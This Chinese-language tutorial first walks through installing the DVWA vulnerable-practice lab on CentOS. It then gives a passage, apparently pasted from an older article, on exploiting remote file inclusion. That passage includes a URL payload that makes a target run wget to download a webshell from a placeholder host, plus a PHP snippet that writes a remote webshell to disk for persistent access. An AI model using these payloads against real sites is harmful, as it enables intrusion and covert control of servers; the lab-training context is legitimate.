1.安装步骤:
查看网络连接
这样就是联网了
安装所需要的环境
安装apache :yum -y install httpd
如果是这样说明安装成功
如果这样说明没网(解决方法在开头)
启动apache :service httpd start
安装PHP :yum -y install php
是这样则是安装好了不是这样请检查网络
安装mysql-server:yum -y install mysql-server
这样就是安好了
启动mysql-server:service mysqld start
安装php-mysql关联:yum install php-mysql php-pear php-gd -y
安好后最好连接mysql
输入命令:mysql -uroot -p 默认密码为空
把dvwa文件放到var/www/html目录(dvwa文件在电脑桌面上)
进入/var/www/html/DVWA/config文件修改配置文件
命令:cd /var/www/html/DVWA/config
把文件后缀改成php结尾
编辑文件
把127.0.0.1改成localhost
吧P@ssw0rd改成空
保存退出(先按esc再按shift+;在输入wq保存退出)
重启Apache
浏览器访问
翻到最下面点这个创建数据库
然后稍等片刻即可
2.文件包含
高级
http://hi.baidu.com/m4r10/php/index.php? page=http://www.xxx.cn/cmd.txt?cmd=wgethttp://www.xxx.cn/m4r10.txt -O m4r10.php,
如果当前目录可写,就能得到一个叫做m4r10.php的Webshell了,如果当前目录不可写,还需要想其它的办法
.包含一个创建文件的PHP文件
也许有的人认为还是得到目标机上的一个真实的Webshell比较放心,万一哪天人家发现这儿个包含漏洞修补了,我们就不能再远程包含得到上面的那个" 伪"Webshell了,不是么?可以理解这个心态,我们继续。得到一个真实的Webshell,我们也说两种常见的方法:
1)使用wget之类的命令来下载一个Webshell
这个比较简单,也很常用,在上面我们得到的那个伪webshell中,我们可以执行命令,那么我们也可以调用系统中的一个很厉害的角色,wget,这个命令的强大你可以google下,参数一大堆,绝对搞晕你,呵呵,我们不需要那么复杂,我们就使用一个-O(--output- document=FILE,把文档写到FILE文件中) 就可以了,呵呵。
前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方,比如:http://www.xxx.cn/m4r10.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中执行如下的URL:http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/cmd.txt?cmd=wgethttp://www.xxx.cn/m4r10.txt -O m4r10.php,如果当前目录可写,就能得到一个叫做m4r10.php的Webshell了,如果当前目录不可写,还需要想其它的办法。
2)使用文件来创建
前面的wget可能会遇到当前目录不能写的情况;或者目标主机禁用了(或者没装)这个命令,我们又需要变通一下了,我们可以结合前面的包含文件漏洞来包含一个创建文件(写文件)的PHP脚本,内容如下:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------------------------
$f=file_get_contents("http://www.xxx.cn/m4r10.txt"); //打开指定路径的文件流
$ff=fopen("./upload/m4r10.php","a"); //寻找一个可以的目录,创建一个文件
fwrite ($ff,$f); //把前面打开的文件流写到创建的文件里
fclose($ff); //关闭保存文件
?>
